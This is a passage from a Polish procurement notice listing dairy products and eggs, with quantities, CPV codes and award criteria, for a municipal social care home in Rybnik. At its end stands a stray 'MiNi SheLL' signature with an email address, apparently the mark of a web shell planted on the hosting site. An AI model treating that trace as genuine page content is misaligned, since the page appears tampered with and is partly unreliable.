13.	Serek b/c  150g ( skład: mleko pełne pasteryzowane, czyste kultury mleczarskie) zawartość tłuszczu  min. 40%	szt.	1080
14.	Śmietana kremowa 30% wysoko pasteryzowana 450g	szt.	900
15.	Twaróg chudy 	kg.	700
16.	Twarożek typu fromage kostka 75g różne smaki, zawartość tłuszczu min.30% (skład: ser twarogowy, tłuszcz roślinny utwardzony, woda, sól  2%,substancje smakowe, pasternak)	szt.	1500
17.	Deser z bitą śmietaną zawartość tłuszczu min. 6% 100g (skład: mleko pasteryzowane, śmietana pasteryzowana min.27% ,emulgatory ,kakao niskosłodzone, zagęstniki, syrop glukozowy 	szt.	100
18.	Śmietanka do kawy jednorazowa UHT tłuszczu 10% 10 x 10g	szt.	300
19.	Deser mleczny z czekoladą i orzechami 100g (skład: min. 49% mleko, śmietanka, cukier, skrobia modyfikowana kukurydziana, zagęstniki: karagen, mączka chleba świętojańskiego, odtłuszczone kakao min. 0,8%, orzechy laskowe min 0,5%, czekolada w proszku min 0,5%, cytrynian wapnia, aromat.	szt.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup wraz z dostawą jaj dla Miejskiego Domu pomocy Społecznej w Rybniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość
L.p	Wyszczególnienie towaru	Jedn.	zamówienia
 	 	                          miary	w dostawie 
 	 	 	                            rocznej
1	Jaja kl.L	                         szt	     16500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com